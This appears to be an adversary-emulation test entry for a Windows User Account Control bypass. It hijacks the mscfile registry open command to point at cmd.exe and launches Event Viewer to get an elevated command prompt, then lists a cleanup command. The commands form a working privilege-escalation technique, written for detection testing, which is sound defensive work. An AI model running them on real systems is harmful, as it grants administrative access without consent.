#TechniqueName: Abuse Elevation Control Mechanism: Bypass User Access Control
#AtomicTestName: Bypass UAC using Event Viewer (cmd)
#Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/&Upon execution command prompt should be launched with administrative privelages&
#Language: cmd

#commands
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f
cmd.exe /c eventvwr.msc


#cleanup_commands
reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1

